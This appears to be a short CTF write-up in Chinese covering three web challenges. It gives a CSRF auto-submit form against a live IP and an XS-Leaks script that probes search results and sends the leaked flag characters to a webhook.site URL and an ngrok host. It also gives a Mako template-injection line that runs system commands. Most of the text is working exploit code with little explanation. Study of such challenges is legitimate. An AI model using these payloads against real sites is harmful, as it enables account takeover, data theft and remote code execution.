fxxkcors
CSRF题目,但是之前没做过,学习一下,大概思路就是通过让robots访问这个表单,然后就可以提升权限
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://124.71.205.122:10002/changeapi.php" method="POST" enctype="text/plain">
<input type="hidden" name='{"username":"skr","test":"' value='"}' />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
|
ez_note
跳转类型 XS-Leaks
https://xsleaks.dev/docs/attacks/navigations/
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
</head>
<body>
<script>
var flag = 'SUSCTF{'
function send(msg) {
fetch('https://webhook.site/bad84752-95a1-45c4-8395-e5577ea1112b?msg=' + encodeURIComponent(msg))
}
function trying(keyword) {
return new Promise(resolve => {
var win = window.open('http://123.60.29.171:10001/search?q=' + keyword)
setTimeout(() => {
win.location = 'http://e050-220-133-126-220.ngrok.io/non.html'
setTimeout(() => {
if (win.history.length === 3) {
send('success:' + keyword)
} else {
}
win.close();
}, 1000)
}, 1500)
})
}
async function run() {
send('start')
let chars = '_abcdefghijklmnopqrstuv'.split('')
for(let char of chars) {
const temp = flag + char
trying(temp)
}
}
setTimeout(() => {
run()
}, 1000)
</script>
</body>
</html>
|
HTML practice
使用##可以让页面空白——>mako框架,
可以使用下面语句执行命令,但是无回显结果,不过可以存到其他文件夹里,使用文件重定向符号
% for a in (self.module.cache.util.os.system(name),2,3):
1
% endfor
|